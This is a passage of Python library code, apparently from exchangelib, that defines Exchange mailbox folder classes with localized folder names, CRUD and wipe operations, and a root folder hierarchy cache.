if not isinstance(field_path, FieldPath):
raise ValueError("Field %r must be a string or FieldPath object" % field_path)
if field_path.field.name == 'start':
has_start = True
elif field_path.field.name == 'end':
has_end = True
# For CalendarItem items, we want to inject internal timezone fields. See also CalendarItem.clean()
if CalendarItem in self.supported_item_models:
meeting_tz_field, start_tz_field, end_tz_field = CalendarItem.timezone_fields()
if self.root.account.version.build < EXCHANGE_2010:
if has_start or has_end:
fields.append(FieldPath(field=meeting_tz_field))
else:
if has_start:
fields.append(FieldPath(field=start_tz_field))
if has_end:
fields.append(FieldPath(field=end_tz_field))
return fields
@classmethod
def get_item_field_by_fieldname(cls, fieldname):
for item_model in cls.supported_item_models:
try:
return item_model.get_field_by_fieldname(fieldname)
except InvalidField:
pass
raise InvalidField("%r is not a valid field name on %s" % (fieldname, cls.supported_item_models))
def get(self, *args, **kwargs):
return FolderCollection(account=self.root.account, folders=[self]).get(*args, **kwargs)
def all(self):
return FolderCollection(account=self.root.account, folders=[self]).all()
def none(self):
return FolderCollection(account=self.root.account, folders=[self]).none()
def filter(self, *args, **kwargs):
return FolderCollection(account=self.root.account, folders=[self]).filter(*args, **kwargs)
def exclude(self, *args, **kwargs):
return FolderCollection(account=self.root.account, folders=[self]).exclude(*args, **kwargs)
def people(self):
return QuerySet(
folder_collection=FolderCollection(account=self.root.account, folders=[self]),
request_type=QuerySet.PERSONA,
)
def find_people(self, q, shape=ID_ONLY, depth=SHALLOW, additional_fields=None, order_fields=None, page_size=None,
max_items=None, offset=0):
"""
Private method to call the FindPeople service
:param q: a Q instance containing any restrictions
:param shape: controls whether to return (id, chanegkey) tuples or Persona objects. If additional_fields is
non-null, we always return Persona objects.
:param depth: controls the whether to return soft-deleted items or not.
:param additional_fields: the extra properties we want on the return objects. Default is no properties.
:param order_fields: the SortOrder fields, if any
:param page_size: the requested number of items per page
:param max_items: the max number of items to return
:param offset: the offset relative to the first item in the item collection
:return: a generator for the returned personas
"""
if shape not in SHAPE_CHOICES:
raise ValueError("'shape' %s must be one of %s" % (shape, SHAPE_CHOICES))
if depth not in ITEM_TRAVERSAL_CHOICES:
raise ValueError("'depth' %s must be one of %s" % (depth, ITEM_TRAVERSAL_CHOICES))
if additional_fields:
for f in additional_fields:
Persona.validate_field(field=f, version=self.root.account.version)
if f.field.is_complex:
raise ValueError("find_people() does not support field '%s'" % f.field.name)
# Build up any restrictions
if q.is_empty():
restriction = None
query_string = None
elif q.query_string:
restriction = None
query_string = Restriction(q, folders=[self], applies_to=Restriction.ITEMS)
else:
restriction = Restriction(q, folders=[self], applies_to=Restriction.ITEMS)
query_string = None
personas = FindPeople(account=self.root.account, chunk_size=page_size).call(
folder=self,
additional_fields=additional_fields,
restriction=restriction,
order_fields=order_fields,
shape=shape,
query_string=query_string,
depth=depth,
max_items=max_items,
offset=offset,
)
for p in personas:
if isinstance(p, Exception):
raise p
yield p
def bulk_create(self, items, *args, **kwargs):
return self.root.account.bulk_create(folder=self, items=items, *args, **kwargs)
def save(self, update_fields=None):
if self.id is None:
# New folder
if update_fields:
raise ValueError("'update_fields' is only valid for updates")
res = list(CreateFolder(account=self.root.account).call(parent_folder=self.parent, folders=[self]))
if len(res) != 1:
raise ValueError('Expected result length 1, but got %s' % res)
if isinstance(res[0], Exception):
raise res[0]
self.id, self.changekey = res[0].id, res[0].changekey
self.root.add_folder(self) # Add this folder to the cache
return self
# Update folder
if not update_fields:
# The fields to update was not specified explicitly. Update all fields where update is possible
update_fields = []
for f in self.supported_fields(version=self.root.account.version):
if f.is_read_only:
# These cannot be changed
continue
if f.is_required or f.is_required_after_save:
if getattr(self, f.name) is None or (f.is_list and not getattr(self, f.name)):
# These are required and cannot be deleted
continue
update_fields.append(f.name)
res = list(UpdateFolder(account=self.root.account).call(folders=[(self, update_fields)]))
if len(res) != 1:
raise ValueError('Expected result length 1, but got %s' % res)
if isinstance(res[0], Exception):
raise res[0]
folder_id, changekey = res[0].id, res[0].changekey
if self.id != folder_id:
raise ValueError('ID mismatch')
# Don't check changekey value. It may not change on no-op updates
self.changekey = changekey
self.root.update_folder(self) # Update the folder in the cache
return None
def delete(self, delete_type=HARD_DELETE):
if delete_type not in DELETE_TYPE_CHOICES:
raise ValueError("'delete_type' %s must be one of %s" % (delete_type, DELETE_TYPE_CHOICES))
res = list(DeleteFolder(account=self.root.account).call(folders=[self], delete_type=delete_type))
if len(res) != 1:
raise ValueError('Expected result length 1, but got %s' % res)
if isinstance(res[0], Exception):
raise res[0]
self.root.remove_folder(self) # Remove the updated folder from the cache
self.id, self.changekey = None, None
def empty(self, delete_type=HARD_DELETE, delete_sub_folders=False):
if delete_type not in DELETE_TYPE_CHOICES:
raise ValueError("'delete_type' %s must be one of %s" % (delete_type, DELETE_TYPE_CHOICES))
res = list(EmptyFolder(account=self.root.account).call(folders=[self], delete_type=delete_type,
delete_sub_folders=delete_sub_folders))
if len(res) != 1:
raise ValueError('Expected result length 1, but got %s' % res)
if isinstance(res[0], Exception):
raise res[0]
if delete_sub_folders:
# We don't know exactly what was deleted, so invalidate the entire folder cache to be safe
self.root.clear_cache()
def wipe(self):
# Recursively deletes all items in this folder, and all subfolders and their content. Attempts to protect
# distinguished folders from being deleted. Use with caution!
log.warning('Wiping %s', self)
has_distinguished_subfolders = any(f.is_distinguished for f in self.children)
try:
if has_distinguished_subfolders:
self.empty(delete_sub_folders=False)
else:
self.empty(delete_sub_folders=True)
except (ErrorAccessDenied, ErrorCannotEmptyFolder):
try:
if has_distinguished_subfolders:
raise # We already tried this
self.empty(delete_sub_folders=False)
except (ErrorAccessDenied, ErrorCannotEmptyFolder):
log.warning('Not allowed to empty %s. Trying to delete items instead', self)
try:
self.all().delete()
except (ErrorAccessDenied, ErrorCannotDeleteObject):
log.warning('Not allowed to delete items in %s', self)
for f in self.children:
f.wipe()
# Remove non-distinguished children that are empty and have no subfolders
if f.is_deleteable and not f.children:
log.warning('Deleting folder %s', f)
try:
f.delete()
except ErrorDeleteDistinguishedFolder:
log.warning('Tried to delete a distinguished folder (%s)', f)
def test_access(self):
"""
Does a simple FindItem to test (read) access to the folder. Maybe the account doesn't exist, maybe the
service user doesn't have access to the calendar. This will throw the most common errors.
"""
list(self.filter(subject='DUMMY').values_list('subject'))
return True
@classmethod
def from_xml(cls, elem, root):
# fld_type = re.sub('{.*}', '', elem.tag)
fld_id_elem = elem.find(FolderId.response_tag())
fld_id = fld_id_elem.get(FolderId.ID_ATTR)
changekey = fld_id_elem.get(FolderId.CHANGEKEY_ATTR)
kwargs = {f.name: f.from_xml(elem=elem, account=root.account) for f in cls.supported_fields()}
if not kwargs['name']:
# Some folders are returned with an empty 'DisplayName' element. Assign a default name to them.
# TODO: Only do this if we actually requested the 'name' field.
kwargs['name'] = cls.DISTINGUISHED_FOLDER_ID
cls._clear(elem)
folder_cls = cls
if cls == Folder:
# We were called on the generic Folder class. Try to find a more specific class to return objects as.
#
# The "FolderClass" element value is the only indication we have in the FindFolder response of which
# folder class we should create the folder with. And many folders share the same 'FolderClass' value, e.g.
# Inbox and DeletedItems. We want to distinguish between these because otherwise we can't locate the right
# folders types for e.g. Account.inbox and Account.trash.
#
# We should be able to just use the name, but apparently default folder names can be renamed to a set of
# localized names using a PowerShell command:
# https://technet.microsoft.com/da-dk/library/dd351103(v=exchg.160).aspx
#
# Instead, search for a folder class using the localized name. If none are found, fall back to getting the
# folder class by the "FolderClass" value.
#
# The returned XML may contain neither folder class nor name. In that case, we default
if kwargs['name']:
try:
# TODO: fld_class.LOCALIZED_NAMES is most definitely neither complete nor authoritative
folder_cls = root.folder_cls_from_folder_name(folder_name=kwargs['name'],
locale=root.account.locale)
log.debug('Folder class %s matches localized folder name %s', folder_cls, kwargs['name'])
except KeyError:
pass
if kwargs['folder_class'] and folder_cls == Folder:
try:
folder_cls = cls.folder_cls_from_container_class(container_class=kwargs['folder_class'])
log.debug('Folder class %s matches container class %s (%s)', folder_cls, kwargs['folder_class'],
kwargs['name'])
except KeyError:
pass
if folder_cls == Folder:
log.debug('Fallback to class Folder (folder_class %s, name %s)', kwargs['folder_class'], kwargs['name'])
return folder_cls(root=root, id=fld_id, changekey=changekey, **kwargs)
def to_xml(self, version):
if self.is_distinguished:
# Don't add the changekey here. When modifying folder content, we usually don't care if others have changed
# the folder content since we fetched the changekey.
if self.root and self.root.account:
return DistinguishedFolderId(
id=self.DISTINGUISHED_FOLDER_ID,
mailbox=Mailbox(email_address=self.root.account.primary_smtp_address)
).to_xml(version=version)
return DistinguishedFolderId(id=self.DISTINGUISHED_FOLDER_ID).to_xml(version=version)
if self.id:
return FolderId(id=self.id, changekey=self.changekey).to_xml(version=version)
return super(Folder, self).to_xml(version=version)
@classmethod
def supported_fields(cls, version=None):
return tuple(f for f in cls.FIELDS if f.name not in ('id', 'changekey') and f.supports_version(version))
@classmethod
def get_distinguished(cls, root):
"""Gets the distinguished folder for this folder class"""
if not cls.DISTINGUISHED_FOLDER_ID:
raise ValueError('Class %s must have a DISTINGUISHED_FOLDER_ID value' % cls)
folders = list(FolderCollection(
account=root.account,
folders=[cls(root=root, name=cls.DISTINGUISHED_FOLDER_ID, is_distinguished=True)]
).get_folders()
)
if not folders:
raise ErrorFolderNotFound('Could not find distinguished folder %s' % cls.DISTINGUISHED_FOLDER_ID)
if len(folders) != 1:
raise ValueError('Expected result length 1, but got %s' % folders)
folder = folders[0]
if isinstance(folder, Exception):
raise folder
if folder.__class__ != cls:
raise ValueError("Expected 'folder' %r to be a %s instance" % (folder, cls))
return folder
def refresh(self):
if not self.root:
raise ValueError('%s must have a root' % self.__class__.__name__)
if not self.id:
raise ValueError('%s must have an ID' % self.__class__.__name__)
folders = list(FolderCollection(account=self.root.account, folders=[self]).get_folders())
if not folders:
raise ErrorFolderNotFound('Folder %s disappeared' % self)
if len(folders) != 1:
raise ValueError('Expected result length 1, but got %s' % folders)
fresh_folder = folders[0]
if isinstance(fresh_folder, Exception):
raise fresh_folder
if self.id != fresh_folder.id:
raise ValueError('ID mismatch')
# Apparently, the changekey may get updated
for f in self.FIELDS:
setattr(self, f.name, getattr(fresh_folder, f.name))
def __floordiv__(self, other):
"""Same as __truediv__ but does not touch the folder cache.
This is useful if the folder hierarchy contains a huge number of folders and you don't want to fetch them all"""
if other == '..':
raise ValueError('Cannot get parent without a folder cache')
if other == '.':
return self
# Assume an exact match on the folder name in a shallow search will only return at most one folder
for f in FolderCollection(account=self.root.account, folders=[self]).find_folders(
q=Q(name=other), depth=SHALLOW
):
return f
raise ErrorFolderNotFound("No subfolder with name '%s'" % other)
def __truediv__(self, other):
# Support the some_folder / 'child_folder' / 'child_of_child_folder' navigation syntax
if other == '..':
if not self.parent:
raise ValueError('Already at top')
return self.parent
if other == '.':
return self
for c in self.children:
if c.name == other:
return c
raise ErrorFolderNotFound("No subfolder with name '%s'" % other)
if PY2:
# Python 2 requires __div__
__div__ = __truediv__
def __repr__(self):
return self.__class__.__name__ + \
repr((self.root, self.name, self.total_count, self.unread_count, self.child_folder_count,
self.folder_class, self.id, self.changekey))
def __str__(self):
return '%s (%s)' % (self.__class__.__name__, self.name)
class Calendar(Folder):
"""
An interface for the Exchange calendar
"""
DISTINGUISHED_FOLDER_ID = 'calendar'
CONTAINER_CLASS = 'IPF.Appointment'
supported_item_models = (CalendarItem,)
LOCALIZED_NAMES = {
'da_DK': (u'Kalender',),
'de_DE': (u'Kalender',),
'en_US': (u'Calendar',),
'es_ES': (u'Calendario',),
'fr_CA': (u'Calendrier',),
'nl_NL': (u'Agenda',),
'ru_RU': (u'Календарь',),
'sv_SE': (u'Kalender',),
'zh_CN': (u'日历',),
}
def view(self, *args, **kwargs):
return FolderCollection(account=self.root.account, folders=[self]).view(*args, **kwargs)
class DeletedItems(Folder):
DISTINGUISHED_FOLDER_ID = 'deleteditems'
CONTAINER_CLASS = 'IPF.Note'
supported_item_models = ITEM_CLASSES
LOCALIZED_NAMES = {
'da_DK': (u'Slettet post',),
'de_DE': (u'Gelöschte Elemente',),
'en_US': (u'Deleted Items',),
'es_ES': (u'Elementos eliminados',),
'fr_CA': (u'Éléments supprimés',),
'nl_NL': (u'Verwijderde items',),
'ru_RU': (u'Удаленные',),
'sv_SE': (u'Borttaget',),
'zh_CN': (u'已删除邮件',),
}
class Messages(Folder):
CONTAINER_CLASS = 'IPF.Note'
supported_item_models = (Message, MeetingRequest, MeetingResponse, MeetingCancellation)
class Drafts(Messages):
DISTINGUISHED_FOLDER_ID = 'drafts'
LOCALIZED_NAMES = {
'da_DK': (u'Kladder',),
'de_DE': (u'Entwürfe',),
'en_US': (u'Drafts',),
'es_ES': (u'Borradores',),
'fr_CA': (u'Brouillons',),
'nl_NL': (u'Concepten',),
'ru_RU': (u'Черновики',),
'sv_SE': (u'Utkast',),
'zh_CN': (u'草稿',),
}
class Inbox(Messages):
DISTINGUISHED_FOLDER_ID = 'inbox'
LOCALIZED_NAMES = {
'da_DK': (u'Indbakke',),
'de_DE': (u'Posteingang',),
'en_US': (u'Inbox',),
'es_ES': (u'Bandeja de entrada',),
'fr_CA': (u'Boîte de réception',),
'nl_NL': (u'Postvak IN',),
'ru_RU': (u'Входящие',),
'sv_SE': (u'Inkorgen',),
'zh_CN': (u'收件箱',),
}
class Outbox(Messages):
DISTINGUISHED_FOLDER_ID = 'outbox'
LOCALIZED_NAMES = {
'da_DK': (u'Udbakke',),
'de_DE': (u'Postausgang',),
'en_US': (u'Outbox',),
'es_ES': (u'Bandeja de salida',),
'fr_CA': (u"Boîte d'envoi",),
'nl_NL': (u'Postvak UIT',),
'ru_RU': (u'Исходящие',),
'sv_SE': (u'Utkorgen',),
'zh_CN': (u'发件箱',),
}
class SentItems(Messages):
DISTINGUISHED_FOLDER_ID = 'sentitems'
LOCALIZED_NAMES = {
'da_DK': (u'Sendt post',),
'de_DE': (u'Gesendete Elemente',),
'en_US': (u'Sent Items',),
'es_ES': (u'Elementos enviados',),
'fr_CA': (u'Éléments envoyés',),
'nl_NL': (u'Verzonden items',),
'ru_RU': (u'Отправленные',),
'sv_SE': (u'Skickat',),
'zh_CN': (u'已发送邮件',),
}
class JunkEmail(Messages):
DISTINGUISHED_FOLDER_ID = 'junkemail'
LOCALIZED_NAMES = {
'da_DK': (u'Uønsket e-mail',),
'de_DE': (u'Junk-E-Mail',),
'en_US': (u'Junk E-mail',),
'es_ES': (u'Correo no deseado',),
'fr_CA': (u'Courrier indésirables',),
'nl_NL': (u'Ongewenste e-mail',),
'ru_RU': (u'Нежелательная почта',),
'sv_SE': (u'Skräppost',),
'zh_CN': (u'垃圾邮件',),
}
class Tasks(Folder):
DISTINGUISHED_FOLDER_ID = 'tasks'
CONTAINER_CLASS = 'IPF.Task'
supported_item_models = (Task,)
LOCALIZED_NAMES = {
'da_DK': (u'Opgaver',),
'de_DE': (u'Aufgaben',),
'en_US': (u'Tasks',),
'es_ES': (u'Tareas',),
'fr_CA': (u'Tâches',),
'nl_NL': (u'Taken',),
'ru_RU': (u'Задачи',),
'sv_SE': (u'Uppgifter',),
'zh_CN': (u'任务',),
}
class Contacts(Folder):
DISTINGUISHED_FOLDER_ID = 'contacts'
CONTAINER_CLASS = 'IPF.Contact'
supported_item_models = (Contact, DistributionList)
LOCALIZED_NAMES = {
'da_DK': (u'Kontaktpersoner',),
'de_DE': (u'Kontakte',),
'en_US': (u'Contacts',),
'es_ES': (u'Contactos',),
'fr_CA': (u'Contacts',),
'nl_NL': (u'Contactpersonen',),
'ru_RU': (u'Контакты',),
'sv_SE': (u'Kontakter',),
'zh_CN': (u'联系人',),
}
class WellknownFolder(Folder):
# Use this class until we have specific folder implementations
supported_item_models = ITEM_CLASSES
class AdminAuditLogs(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'adminauditlogs'
supported_from = EXCHANGE_2013
class ArchiveDeletedItems(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'archivedeleteditems'
supported_from = EXCHANGE_2010_SP1
class ArchiveInbox(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'archiveinbox'
supported_from = EXCHANGE_2013_SP1
class ArchiveMsgFolderRoot(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'archivemsgfolderroot'
supported_from = EXCHANGE_2010_SP1
class ArchiveRecoverableItemsDeletions(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'archiverecoverableitemsdeletions'
supported_from = EXCHANGE_2010_SP1
class ArchiveRecoverableItemsPurges(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'archiverecoverableitemspurges'
supported_from = EXCHANGE_2010_SP1
class ArchiveRecoverableItemsRoot(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'archiverecoverableitemsroot'
supported_from = EXCHANGE_2010_SP1
class ArchiveRecoverableItemsVersions(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'archiverecoverableitemsversions'
supported_from = EXCHANGE_2010_SP1
class Conflicts(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'conflicts'
supported_from = EXCHANGE_2013
class ConversationHistory(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'conversationhistory'
supported_from = EXCHANGE_2013
class Directory(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'directory'
supported_from = EXCHANGE_2013_SP1
class Favorites(WellknownFolder):
CONTAINER_CLASS = 'IPF.Note'
DISTINGUISHED_FOLDER_ID = 'favorites'
supported_from = EXCHANGE_2013
class IMContactList(WellknownFolder):
CONTAINER_CLASS = 'IPF.Contact.MOC.ImContactList'
DISTINGUISHED_FOLDER_ID = 'imcontactlist'
supported_from = EXCHANGE_2013
class Journal(WellknownFolder):
CONTAINER_CLASS = 'IPF.Journal'
DISTINGUISHED_FOLDER_ID = 'journal'
class LocalFailures(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'localfailures'
supported_from = EXCHANGE_2013
class MsgFolderRoot(WellknownFolder):
# Also known as the 'Top of Information Store' folder
DISTINGUISHED_FOLDER_ID = 'msgfolderroot'
LOCALIZED_NAMES = {
'zh_CN': (u'信息存储顶部',),
}
class MyContacts(WellknownFolder):
CONTAINER_CLASS = 'IPF.Note'
DISTINGUISHED_FOLDER_ID = 'mycontacts'
supported_from = EXCHANGE_2013
class Notes(WellknownFolder):
CONTAINER_CLASS = 'IPF.StickyNote'
DISTINGUISHED_FOLDER_ID = 'notes'
LOCALIZED_NAMES = {
'da_DK': (u'Noter',),
}
class PeopleConnect(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'peopleconnect'
supported_from = EXCHANGE_2013
class QuickContacts(WellknownFolder):
CONTAINER_CLASS = 'IPF.Contact.MOC.QuickContacts'
DISTINGUISHED_FOLDER_ID = 'quickcontacts'
supported_from = EXCHANGE_2013
class RecipientCache(Contacts):
DISTINGUISHED_FOLDER_ID = 'recipientcache'
CONTAINER_CLASS = 'IPF.Contact.RecipientCache'
supported_from = EXCHANGE_2013
LOCALIZED_NAMES = {}
class RecoverableItemsDeletions(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'recoverableitemsdeletions'
supported_from = EXCHANGE_2010_SP1
class RecoverableItemsPurges(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'recoverableitemspurges'
supported_from = EXCHANGE_2010_SP1
class RecoverableItemsRoot(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'recoverableitemsroot'
supported_from = EXCHANGE_2010_SP1
class RecoverableItemsVersions(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'recoverableitemsversions'
supported_from = EXCHANGE_2010_SP1
class SearchFolders(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'searchfolders'
class ServerFailures(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'serverfailures'
supported_from = EXCHANGE_2013
class SyncIssues(WellknownFolder):
CONTAINER_CLASS = 'IPF.Note'
DISTINGUISHED_FOLDER_ID = 'syncissues'
supported_from = EXCHANGE_2013
class ToDoSearch(WellknownFolder):
CONTAINER_CLASS = 'IPF.Task'
DISTINGUISHED_FOLDER_ID = 'todosearch'
supported_from = EXCHANGE_2013
LOCALIZED_NAMES = {
None: (u'To-Do Search',),
}
class VoiceMail(WellknownFolder):
DISTINGUISHED_FOLDER_ID = 'voicemail'
class NonDeleteableFolderMixin:
@property
def is_deleteable(self):
return False
class AllContacts(NonDeleteableFolderMixin, Contacts):
CONTAINER_CLASS = 'IPF.Note'
LOCALIZED_NAMES = {
None: (u'AllContacts',),
}
class AllItems(NonDeleteableFolderMixin, Folder):
CONTAINER_CLASS = 'IPF'
LOCALIZED_NAMES = {
None: (u'AllItems',),
}
class CalendarLogging(NonDeleteableFolderMixin, Folder):
LOCALIZED_NAMES = {
None: ('Calendar Logging',),
}
class CommonViews(NonDeleteableFolderMixin, Folder):
LOCALIZED_NAMES = {
None: ('Common Views',),
}
class ConversationSettings(NonDeleteableFolderMixin, Folder):
CONTAINER_CLASS = 'IPF.Configuration'
LOCALIZED_NAMES = {
'da_DK': (u'Indstillinger for samtalehandlinger',),
}
class DeferredAction(NonDeleteableFolderMixin, Folder):
LOCALIZED_NAMES = {
None: ('Deferred Action',),
}
class ExchangeSyncData(NonDeleteableFolderMixin, Folder):
LOCALIZED_NAMES = {
None: (u'ExchangeSyncData',),
}
class FreebusyData(NonDeleteableFolderMixin, Folder):
LOCALIZED_NAMES = {
None: (u'Freebusy Data',),
}
class Friends(NonDeleteableFolderMixin, Contacts):
CONTAINER_CLASS = 'IPF.Note'
LOCALIZED_NAMES = {
'de_DE': (u'Bekannte',),
}
class GALContacts(NonDeleteableFolderMixin, Contacts):
DISTINGUISHED_FOLDER_ID = None
CONTAINER_CLASS = 'IPF.Contact.GalContacts'
LOCALIZED_NAMES = {
None: ('GAL Contacts',),
}
class Location(NonDeleteableFolderMixin, Folder):
LOCALIZED_NAMES = {
None: (u'Location',),
}
class MailboxAssociations(NonDeleteableFolderMixin, Folder):
LOCALIZED_NAMES = {
None: (u'MailboxAssociations',),
}
class MyContactsExtended(NonDeleteableFolderMixin, Contacts):
CONTAINER_CLASS = 'IPF.Note'
LOCALIZED_NAMES = {
None: (u'MyContactsExtended',),
}
class ParkedMessages(NonDeleteableFolderMixin, Folder):
CONTAINER_CLASS = None
LOCALIZED_NAMES = {
None: (u'ParkedMessages',),
}
class Reminders(NonDeleteableFolderMixin, Folder):
CONTAINER_CLASS = 'Outlook.Reminder'
LOCALIZED_NAMES = {
'da_DK': (u'Påmindelser',),
}
class RSSFeeds(NonDeleteableFolderMixin, Folder):
CONTAINER_CLASS = 'IPF.Note.OutlookHomepage'
LOCALIZED_NAMES = {
None: (u'RSS Feeds',),
}
class Schedule(NonDeleteableFolderMixin, Folder):
LOCALIZED_NAMES = {
None: (u'Schedule',),
}
class Sharing(NonDeleteableFolderMixin, Folder):
CONTAINER_CLASS = 'IPF.Note'
LOCALIZED_NAMES = {
None: (u'Sharing',),
}
class Shortcuts(NonDeleteableFolderMixin, Folder):
LOCALIZED_NAMES = {
None: (u'Shortcuts',),
}
class SpoolerQueue(NonDeleteableFolderMixin, Folder):
LOCALIZED_NAMES = {
None: (u'Spooler Queue',),
}
class System(NonDeleteableFolderMixin, Folder):
LOCALIZED_NAMES = {
None: (u'System',),
}
class TemporarySaves(NonDeleteableFolderMixin, Folder):
LOCALIZED_NAMES = {
None: (u'TemporarySaves',),
}
class Views(NonDeleteableFolderMixin, Folder):
LOCALIZED_NAMES = {
None: (u'Views',),
}
class WorkingSet(NonDeleteableFolderMixin, Folder):
LOCALIZED_NAMES = {
None: (u'Working Set',),
}
class RootOfHierarchy(Folder):
# A list of wellknown, or "distinguished", folders that are belong in this folder hierarchy. See
# http://msdn.microsoft.com/en-us/library/microsoft.exchange.webservices.data.wellknownfoldername(v=exchg.80).aspx
# and https://msdn.microsoft.com/en-us/library/office/aa580808(v=exchg.150).aspx
# 'RootOfHierarchy' subclasses must not be in this list.
WELLKNOWN_FOLDERS = []
TRAVERSAL_DEPTH = DEEP
# A special folder that acts as the top of a folder hierarchy. Finds and caches subfolders at arbitrary depth.
def __init__(self, **kwargs):
self.account = kwargs.pop('account', None) # A pointer back to the account holding the folder hierarchy
if kwargs.pop('root', None):
raise ValueError("RootOfHierarchy folders do not have a root")
kwargs['root'] = self
super(RootOfHierarchy, self).__init__(**kwargs)
self._subfolders = None # See self._folders_map()
def refresh(self):
self._subfolders = None
super(RootOfHierarchy, self).refresh()
def get_folder(self, folder_id):
return self._folders_map.get(folder_id, None)
def add_folder(self, folder):
if not folder.id:
raise ValueError("'folder' must have an ID")
self._folders_map[folder.id] = folder
def update_folder(self, folder):
if not folder.id:
raise ValueError("'folder' must have an ID")
self._folders_map[folder.id] = folder
def remove_folder(self, folder):
if not folder.id:
raise ValueError("'folder' must have an ID")
try:
del self._folders_map[folder.id]
except KeyError:
pass
def clear_cache(self):
self._subfolders = None
def get_children(self, folder):
for f in self._folders_map.values():
if not f.parent:
continue
if f.parent.id == folder.id:
yield f
@classmethod
def get_distinguished(cls, account):
"""Gets the distinguished folder for this folder class"""
if not cls.DISTINGUISHED_FOLDER_ID:
raise ValueError('Class %s must have a DISTINGUISHED_FOLDER_ID value' % cls)
folders = list(FolderCollection(
account=account,
folders=[cls(account=account, name=cls.DISTINGUISHED_FOLDER_ID, is_distinguished=True)]
).get_folders()
)
if not folders:
raise ErrorFolderNotFound('Could not find distinguished folder %s' % cls.DISTINGUISHED_FOLDER_ID)
if len(folders) != 1:
raise ValueError('Expected result length 1, but got %s' % folders)
folder = folders[0]
if isinstance(folder, Exception):
raise folder
if folder.__class__ != cls:
raise ValueError("Expected 'folder' %r to be a %s instance" % (folder, cls))
return folder
def get_default_folder(self, folder_cls):
# Returns the distinguished folder instance of type folder_cls belonging to this account. If no distinguished
# folder was found, try as best we can to return the default folder of type 'folder_cls'
if not folder_cls.DISTINGUISHED_FOLDER_ID:
raise ValueError("'folder_cls' %s must have a DISTINGUISHED_FOLDER_ID value" % folder_cls)
# Use cached distinguished folder instance, but only if cache has already been prepped. This is an optimization
# for accessing e.g. 'account.contacts' without fetching all folders of the account.
if self._subfolders:
for f in self._folders_map.values():
# Require exact class, to not match subclasses, e.g. RecipientCache instead of Contacts
if f.__class__ == folder_cls and f.is_distinguished:
log.debug('Found cached distinguished %s folder', folder_cls)
return f
try:
log.debug('Requesting distinguished %s folder explicitly', folder_cls)
return folder_cls.get_distinguished(root=self)
except ErrorAccessDenied:
# Maybe we just don't have GetFolder access? Try FindItems instead
log.debug('Testing default %s folder with FindItem', folder_cls)
fld = folder_cls(root=self, name=folder_cls.DISTINGUISHED_FOLDER_ID, is_distinguished=True)
fld.test_access()
return self._folders_map.get(fld.id, fld) # Use cached instance if available
except ErrorFolderNotFound:
# The Exchange server does not return a distinguished folder of this type
pass
raise ErrorFolderNotFound('No useable default %s folders' % folder_cls)
@property
def _folders_map(self):
if self._subfolders is not None:
return self._subfolders
# Map root, and all subfolders of root, at arbitrary depth by folder ID. First get distinguished folders, so we
# are sure to apply the correct Folder class, then fetch all subfolders of this root. AdminAuditLogs folder is
# not retrievable and makes the entire request fail.
folders_map = {self.id: self}
distinguished_folders = [
cls(root=self, name=cls.DISTINGUISHED_FOLDER_ID, is_distinguished=True)
for cls in self.WELLKNOWN_FOLDERS
if cls != AdminAuditLogs and cls.supports_version(self.account.version)
]
try:
for f in FolderCollection(account=self.account, folders=distinguished_folders).get_folders():
if isinstance(f, (ErrorFolderNotFound, ErrorNoPublicFolderReplicaAvailable)):
# This is just a distinguished folder the server does not have
continue
if isinstance(f, ErrorInvalidOperation):
# This is probably a distinguished folder the server does not have. We previously tested the exact
# error message (f.value), but some Exchange servers return localized error messages, so that's not
# possible to do reliably.
continue
if isinstance(f, ErrorItemNotFound):
# Another way of telling us that this is a distinguished folder the server does not have
continue
if isinstance(f, Exception):
raise f
folders_map[f.id] = f
for f in FolderCollection(account=self.account, folders=[self]).find_folders(depth=self.TRAVERSAL_DEPTH):
if isinstance(f, Exception):
raise f
if f.id in folders_map:
# Already exists. Probably a distinguished folder
continue
folders_map[f.id] = f
except ErrorAccessDenied:
# We may not have GetFolder or FindFolder access
pass
self._subfolders = folders_map
return folders_map
@classmethod
def from_xml(cls, elem, account):
# fld_type = re.sub('{.*}', '', elem.tag)
fld_id_elem = elem.find(FolderId.response_tag())
fld_id = fld_id_elem.get(FolderId.ID_ATTR)
changekey = fld_id_elem.get(FolderId.CHANGEKEY_ATTR)
kwargs = {f.name: f.from_xml(elem=elem, account=account) for f in cls.supported_fields()}
if not kwargs['name']:
# Some folders are returned with an empty 'DisplayName' element. Assign a default name to them.
# TODO: Only do this if we actually requested the 'name' field.
kwargs['name'] = cls.DISTINGUISHED_FOLDER_ID
cls._clear(elem)
return cls(account=account, id=fld_id, changekey=changekey, **kwargs)
@classmethod
def folder_cls_from_folder_name(cls, folder_name, locale):
"""Returns the folder class that matches a localized folder name.
locale is a string, e.g. 'da_DK'
"""
for folder_cls in cls.WELLKNOWN_FOLDERS + NON_DELETEABLE_FOLDERS:
if folder_name.lower() in folder_cls.localized_names(locale):
return folder_cls
raise KeyError()
def __repr__(self):
# Let's not create an infinite loop when printing self.root
return self.__class__.__name__ + \
repr((self.account, '[self]', self.name, self.total_count, self.unread_count, self.child_folder_count,
self.folder_class, self.id, self.changekey))
class Root(RootOfHierarchy):
DISTINGUISHED_FOLDER_ID = 'root'
WELLKNOWN_FOLDERS = [
AdminAuditLogs,
Calendar,
Conflicts,
Contacts,
ConversationHistory,
DeletedItems,
Directory,
Drafts,
Favorites,
IMContactList,
Inbox,
Journal,
JunkEmail,
LocalFailures,
MsgFolderRoot,
MyContacts,
Notes,
Outbox,
PeopleConnect,
QuickContacts,
RecipientCache,
RecoverableItemsDeletions,
RecoverableItemsPurges,
RecoverableItemsRoot,
